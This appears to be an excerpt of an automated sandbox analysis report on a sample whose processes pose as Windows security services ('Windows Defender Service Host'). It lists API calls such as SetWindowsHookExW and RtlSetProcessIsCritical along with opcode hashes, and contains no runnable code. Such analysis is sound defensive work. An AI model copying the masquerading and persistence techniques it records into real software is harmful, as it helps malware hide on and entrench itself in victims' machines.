                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 722249c575080a7ae787608f3f23a391d55ad0da62454a98db1376ef4e9e00e5
                                                    • Instruction ID: d4fd18cd491cf34d258275cb167e0e316ad7fe9b4421b4cac18c5bfe6e7c56f6
                                                    • Opcode Fuzzy Hash: 722249c575080a7ae787608f3f23a391d55ad0da62454a98db1376ef4e9e00e5
                                                    • Instruction Fuzzy Hash: 3E41F5B0C00719CBEB25DFA9C844B8DFBF5BF49704F28809AD409AB255DB756946CF90

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 2b81980 to 2b83499, calling CreateActCtxA
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02B83401
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 10284e386d5afb13e41517d8b727c0e859a0849e76b856fe8bdecbdd87b75d8c
                                                    • Instruction ID: 0c881d8945d149e4ad2f87c155bbf8a3786a4346f7f1ea1665f38d4ae659af60
                                                    • Opcode Fuzzy Hash: 10284e386d5afb13e41517d8b727c0e859a0849e76b856fe8bdecbdd87b75d8c
                                                    • Instruction Fuzzy Hash: BE41E4B0C0071DCBEB25DFA9C844B9DBBF5BF48704F2480AAD409AB255DB756946CF90

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 2b8dc3b to 2b8dcfa, calling DuplicateHandle
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B8DCC7
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 2871f7f12859ccff891f2af65494e506cfa431ee283bc9e5bdfb82403fec3ce9
                                                    • Instruction ID: c698b96684bf93f88ac26ce97c85192c569415cbca7f441b1eaac30863497ea3
                                                    • Opcode Fuzzy Hash: 2871f7f12859ccff891f2af65494e506cfa431ee283bc9e5bdfb82403fec3ce9
                                                    • Instruction Fuzzy Hash: 0B21E4B59002499FDB10CFA9D984ADEBBF5FB48310F14845AE918A7350C378A944CFA4
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B8DCC7
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: c7adfd4f1656e0e89df5e5ef9294c32e2c6c45ee336b5f13cf208b6d4a8c8684
                                                    • Instruction ID: 61bee03ac53a08e41510cd0eaba631aace8382add6204b917c31e8625d87d0d1
                                                    • Opcode Fuzzy Hash: c7adfd4f1656e0e89df5e5ef9294c32e2c6c45ee336b5f13cf208b6d4a8c8684
                                                    • Instruction Fuzzy Hash: 2A21E2B59002499FDB10CFAAD984ADEBBF8FB48310F14845AE918A3350D378A940CFA1
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 02B8E6BD
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 90aaa97e0cd1a8e119debbb8ff07518398ececb1f9c49a9d1e2be5ad3e385fa8
                                                    • Instruction ID: 94587e9d37eea27b3fd770aee292e0b6a0d4f3cad2ec65fa9b2bd01ae2702a41
                                                    • Opcode Fuzzy Hash: 90aaa97e0cd1a8e119debbb8ff07518398ececb1f9c49a9d1e2be5ad3e385fa8
                                                    • Instruction Fuzzy Hash: B71123B19047488FDB20EF9AD548BDEFBF8EB48320F208459E518A7350D379A944CFA5
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 02B8E6BD
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 97cc7c8325a78f7a4d0b5ae598fd28e9e7f29ad59d5179e8263cdee5a1eded6e
                                                    • Instruction ID: 44666aa42e9e330958a5ba179e670b445eb613e6497018382c1600c3815bce83
                                                    • Opcode Fuzzy Hash: 97cc7c8325a78f7a4d0b5ae598fd28e9e7f29ad59d5179e8263cdee5a1eded6e
                                                    • Instruction Fuzzy Hash: 8E1115B1D002498FDB20DF9AD588BDEBFF4EB48320F248459E559A7710C378A544CFA5
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2476562791.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2a6d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f67d992c4e89adf772579712dde62578eae83952ac76c650c8395ef4b40be356
                                                    • Instruction ID: 27427a84dd448efb609957197d963da6ba15900a0ed068b9b7a0d8c237fa92ab
                                                    • Opcode Fuzzy Hash: f67d992c4e89adf772579712dde62578eae83952ac76c650c8395ef4b40be356
                                                    • Instruction Fuzzy Hash: C1216771600744DFDB05DF14C9C8F36BF65FB88358F208169E9090B656C73AD806CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2476562791.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2a6d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 11feff2f7a732d6e316767ea3a054f26bf876187b61f78055f19a0e304c1c91a
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 9311D376504680CFCB16CF14D5C4B26BF71FB88318F24C6A9D9094B656C33AD45ACBA2

                                                    Execution Graph

                                                    Execution Coverage: 24.5%
                                                    Dynamic/Decrypted Code Coverage: 100%
                                                    Signature Coverage: 0%
                                                    Total number of Nodes: 23
                                                    Total number of Limit Nodes: 1

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID: H$HAH$HAH$cS_H
                                                    • API String ID: 2706961497-573668203
                                                    • Opcode ID: d0a5022ba52f5712075eba0a3252afbf694e76d83855f9b824cb06e1fe69ccf4
                                                    • Instruction ID: 3499935f4cf1995a3480af0d10f99b90f9135afb30aac355bacc7d83b0198b84
                                                    • Opcode Fuzzy Hash: d0a5022ba52f5712075eba0a3252afbf694e76d83855f9b824cb06e1fe69ccf4
                                                    • Instruction Fuzzy Hash: DFC1353190DA895FE71DEB7898562FA77E1EFA6350F0441BFD08AC31D7DE2868068781

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c30974071c77be536358391b4a501c615bc5c51002ecaa5653ea3240406571bf
                                                    • Instruction ID: 7cf07313c6556e0f3877f053eb1c53c82ade7755690bf19d9c6aa36309091944
                                                    • Opcode Fuzzy Hash: c30974071c77be536358391b4a501c615bc5c51002ecaa5653ea3240406571bf
                                                    • Instruction Fuzzy Hash: E351BD3190DA598FEB69EB58D845BE9B7E0EB69310F0001BBD04DD3282DB35A9858F85

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 7ff848f36808 to 7ff848f3691d, calling SetWindowsHookExW
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: a3972feda065f2f11ed9d6897609ec4dd43e4ece978826097a59317845aeeb9b
                                                    • Instruction ID: 778ba1c341c8e3802165f51c241dffe61bd0152aed83c69481ca19202b7614f9
                                                    • Opcode Fuzzy Hash: a3972feda065f2f11ed9d6897609ec4dd43e4ece978826097a59317845aeeb9b
                                                    • Instruction Fuzzy Hash: 7F31153090CA4C5FDB58EB6CD8466F9BBE1EF59321F10427FD049C3292CB64A852CB81

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 7ff848f352d9 to 7ff848f353d1, calling FindCloseChangeNotification
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 5e74bf9d03024360cc8c58ad3d422ff751f478269101ee7e4c83f6f5c984efa9
                                                    • Instruction ID: 442cf0ec12c09ab1ada3546c7e46be3e0a9fe9631085f32a3aa437c4821c5455
                                                    • Opcode Fuzzy Hash: 5e74bf9d03024360cc8c58ad3d422ff751f478269101ee7e4c83f6f5c984efa9
                                                    • Instruction Fuzzy Hash: 7741273044D6885FC706DBA4CC15BEA7FF4EF97220F0441ABD089C75A3C66D5856CB61

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 7ff848f34985 to 7ff848f34a88, calling RtlSetProcessIsCritical
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: 47d9e17a9452648f5d4c3a2763f7cb7db2f3f054c9ad7430b4d6e9a637b4af72
                                                    • Instruction ID: 2e339420075b8776572b9cbd269e737860240d533b0cfda0b35932bcc7612b95
                                                    • Opcode Fuzzy Hash: 47d9e17a9452648f5d4c3a2763f7cb7db2f3f054c9ad7430b4d6e9a637b4af72
                                                    • Instruction Fuzzy Hash: E8311A3180D7888FEB19EBA898466F97BF0EF66321F04016ED089D3593DB647446CB55

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 7ff848f3598a to 7ff848f3691d, calling SetWindowsHookExW
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: 9dc7462b709e9a4bd978ee2f9bbecc6b43588b704ca9ee70c5dcfa1ef1cd3161
                                                    • Instruction ID: d41f8a3d39fdbd9e552de3adbec4de2be04874527317d573c59a822aef2f8ded
                                                    • Opcode Fuzzy Hash: 9dc7462b709e9a4bd978ee2f9bbecc6b43588b704ca9ee70c5dcfa1ef1cd3161
                                                    • Instruction Fuzzy Hash: 4131C630A1CA1C9FDB58EF5CD8466B9B7E1EB59311F10413ED00ED3291DB64A8528BC5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: d9248e9e7c51332ada3271bcc6031ca890d470bbc6d3ceb28c05744ac90eae8a
                                                    • Instruction ID: 01bce267c02af0030b62e830ece92bc32b6eade3010d43fee34abf190b4d3647
                                                    • Opcode Fuzzy Hash: d9248e9e7c51332ada3271bcc6031ca890d470bbc6d3ceb28c05744ac90eae8a
                                                    • Instruction Fuzzy Hash: C921C17090CB489FDB18EFA8D88ABE97BF0EB65321F04416FD449D3153DA64A445CB52
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: e999477c14674397fde1a05362202092d5082f0fa188606cee07e10a7807d75c
                                                    • Instruction ID: 86a394fd8dbc1828e22516b6ffa159b7e55540986babbc0c254dd930b602b429
                                                    • Opcode Fuzzy Hash: e999477c14674397fde1a05362202092d5082f0fa188606cee07e10a7807d75c
                                                    • Instruction Fuzzy Hash: 7A21C73091CB089FEB18EB98D84A6F977F0EB69321F00013ED04AD3652DB647846CB95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: 337e128fe762c4dbf93b073e455b711d4922302769bfb41fb5b5a22f7e9151e8
                                                    • Instruction ID: 3e486cb0fe8e57f97ccaf3cd47d2be228639d1a24a9902eee2175d0ad5ffd208
                                                    • Opcode Fuzzy Hash: 337e128fe762c4dbf93b073e455b711d4922302769bfb41fb5b5a22f7e9151e8
                                                    • Instruction Fuzzy Hash: 5621F37090CA489FEB58EF98D88A6F97BF0EB69310F00416FD449D3152DB74A849CB55
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 9cffb81fcbe637601ec04a06acd2b124e92bb025da602ea56100cf969d8fde50
                                                    • Instruction ID: b5e6399b789925ca230d431e5b277ea6886eacbddae84bd9ff87c16dfff534d9
                                                    • Opcode Fuzzy Hash: 9cffb81fcbe637601ec04a06acd2b124e92bb025da602ea56100cf969d8fde50
                                                    • Instruction Fuzzy Hash: 1A21B17190CA4C9FDB48EB58C809BF9BBF0FBA5321F00412FD04AC3592DB64A456CB91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: FirstProcess32
                                                    • String ID:
                                                    • API String ID: 2623510744-0
                                                    • Opcode ID: 35d495eb225895aca14bc53c71d0ec57a7b06f5cb32240049049b9438a4bb78b
                                                    • Instruction ID: ef16ec39d79af272e4c8cf92e5ecb66c414037cb952624aa93d6e3901651d2f7
                                                    • Opcode Fuzzy Hash: 35d495eb225895aca14bc53c71d0ec57a7b06f5cb32240049049b9438a4bb78b
                                                    • Instruction Fuzzy Hash: 6421B331A0DA1D8FFB55EB58D845BE9B3F0FB69311F0041AAD04DD3282CB35A9818F81
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 964070efe05fa762c8ab12c54ed36a4009b67982685c18d275c85e94ba6b79e9
                                                    • Instruction ID: 5457abf0757ee7633c695b990842dc5db892cda44af33cf03237ec83af23e321
                                                    • Opcode Fuzzy Hash: 964070efe05fa762c8ab12c54ed36a4009b67982685c18d275c85e94ba6b79e9
                                                    • Instruction Fuzzy Hash: D4529D70A2DA595FE798FB3884A52B9B7E2FF88740F441579E00EC32C7DE28AC418745
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^ $O_^"$O_^$
                                                    • API String ID: 0-3242351273
                                                    • Opcode ID: 77b393ef0b284bb52d308939e6bd96d894a6e2b4c5784a7cefeca505583f3414
                                                    • Instruction ID: 725d05c2ee501d05bfdee474dc4f08bdf87054b99eff19b2fc539c7bd4ea4d6c
                                                    • Opcode Fuzzy Hash: 77b393ef0b284bb52d308939e6bd96d894a6e2b4c5784a7cefeca505583f3414
                                                    • Instruction Fuzzy Hash: E4714A3690F55A6FD341BB6CA4E11EA3FB0EF84359B4425B6D08DCB383DE2C650687A4
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 10d05272ae22047bbef6c2560924b4d3284781670f8a0b9609b3e97ffd970999
                                                    • Instruction ID: bed2ef06c1028523375bd7c871819acbfca27a01341988828d073727440d45d0
                                                    • Opcode Fuzzy Hash: 10d05272ae22047bbef6c2560924b4d3284781670f8a0b9609b3e97ffd970999
                                                    • Instruction Fuzzy Hash: 52712332A0D99A5FE795B73C98562B97BE2EFC9751F0400BAD849C32D3DE286C428750
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a73d18ef9911938b66c7c7dd8356553b57d67272963906971dece462fda0de7
                                                    • Instruction ID: 112e42046c718fb970ce53470ca5daef1e656e62d9e87bcaf7ea01410f817b7c
                                                    • Opcode Fuzzy Hash: 5a73d18ef9911938b66c7c7dd8356553b57d67272963906971dece462fda0de7
                                                    • Instruction Fuzzy Hash: 5941E831A4A6596FD381FB2C90E11EA3FB1FFC8345B8060B6D009C7397CE2C29058BA4
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57180b7ae76a7a74c5853b76d839f03c3a254be0d0069b6afaa41eeb127e3871
                                                    • Instruction ID: c9fe91bb818f5414ea68e5cd084d94711a69181e9bfab1828ca230f9265928d7
                                                    • Opcode Fuzzy Hash: 57180b7ae76a7a74c5853b76d839f03c3a254be0d0069b6afaa41eeb127e3871
                                                    • Instruction Fuzzy Hash: 7731F031F2995A9FE784B7B8581A3B9B6E2FF98741F04017AE40DD32C2DE2C98018752
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51ed6a71325d53d11e0466ff956d1a3a9f732a59739fc3c6e65e2fe10b13a579
                                                    • Instruction ID: 0c1eeab3ba37cb84ca10cb5ecad68f804cb4f3f3204d865326ad60f33e291b8c
                                                    • Opcode Fuzzy Hash: 51ed6a71325d53d11e0466ff956d1a3a9f732a59739fc3c6e65e2fe10b13a579
                                                    • Instruction Fuzzy Hash: 9E31C87164A6496FD386EF2890F16EA7FB1FF88305F8074A5D409C3387CE2C5A008BA1
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 862c54c9456e18e0ea4c1ceab721a90c113e875835d46e2bef2a307c7aedf44c
                                                    • Instruction ID: c103cd457cb8876c29ccfb8203d0f35d588ede37572a22677c7e2dd669f990f0
                                                    • Opcode Fuzzy Hash: 862c54c9456e18e0ea4c1ceab721a90c113e875835d46e2bef2a307c7aedf44c
                                                    • Instruction Fuzzy Hash: 6D31AD31A19A1E9FDB84FB68C4A56EEBBF1FF88301F401579D009D3286DE3CA9018B50
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 122445524f26db7303bf2786ccb060d561e8318efa7b612d0a6b5319370db64e
                                                    • Instruction ID: 362507904f1d248c4f3db55feb8ff252571fc41adb8691e610077fff3f4512f8
                                                    • Opcode Fuzzy Hash: 122445524f26db7303bf2786ccb060d561e8318efa7b612d0a6b5319370db64e
                                                    • Instruction Fuzzy Hash: 62216B30B1DA495FE788EB2C946A379B6D2EB9C745F0405BEE00EC32D7DE68AC418745
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19253c12a47597b3aaa2cad3ef84da36deca8716e9e0d9383c9a1c0b82913c84
                                                    • Instruction ID: 114dc8e7a5680f011ce2dd5b6384bb29d0b9b1cf6fa31af5d184503e6c4a1047
                                                    • Opcode Fuzzy Hash: 19253c12a47597b3aaa2cad3ef84da36deca8716e9e0d9383c9a1c0b82913c84
                                                    • Instruction Fuzzy Hash: A1016860A0D6C10FE342B33868664B27FE4CF953A1F0804ABE889C70D7E8189D848382
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e16b93104d7eb3b9394cc451b10efbe1ddd33b63e7c3f220f9d71531af1b34a
                                                    • Instruction ID: d123dd1a98334d15ffac6452e2a397cb48f4cd9eb9466de3758154b5381b94ac
                                                    • Opcode Fuzzy Hash: 0e16b93104d7eb3b9394cc451b10efbe1ddd33b63e7c3f220f9d71531af1b34a
                                                    • Instruction Fuzzy Hash: E452E171B2DA195FEB98FB7894662B9B7E2FF88340F440579D40EC32C2DE29A8418745
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^ $N_^"$N_^$
                                                    • API String ID: 0-4085958905
                                                    • Opcode ID: 451270aa192673610ed14670e40021bdd8cb6ecd1d2215f36ed7f7e4b295b172
                                                    • Instruction ID: c909ad37722f5736bc31949f831b182d70e0d78a42fc4087ed2348ea6a1e6fd2
                                                    • Opcode Fuzzy Hash: 451270aa192673610ed14670e40021bdd8cb6ecd1d2215f36ed7f7e4b295b172
                                                    • Instruction Fuzzy Hash: D6712576A0A16A5FD341FB7CA8A12EA3FB1EFC0354B4401B2D48CCB283DE2C65068695
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bc1800682d34a14d5808b1f3f0c5ec15deee3930368e568c313aad4ea182e8c
                                                    • Instruction ID: e45d8a23342245f00199565e692014f5a693bc1b23ec71ee66381c4e8a1958d5
                                                    • Opcode Fuzzy Hash: 8bc1800682d34a14d5808b1f3f0c5ec15deee3930368e568c313aad4ea182e8c
                                                    • Instruction Fuzzy Hash: 59714732E0D98A5FE795F77CA8552B97BE1EF99650F0801BAD84DC32D3DE286C028350
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9103cee9f326e636359352473cdb8069d0b5f33504a34233831b4f8aee05fed
                                                    • Instruction ID: b903170be2fee2cae99fb8c569e491594e27d2052ca2f5ac9270399eaf92f16e
                                                    • Opcode Fuzzy Hash: b9103cee9f326e636359352473cdb8069d0b5f33504a34233831b4f8aee05fed
                                                    • Instruction Fuzzy Hash: 2A41C176A4A6695FD341EF38A0A13EA7F71EFC4340B8040A6D40CC77C7CE2D290187A1
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
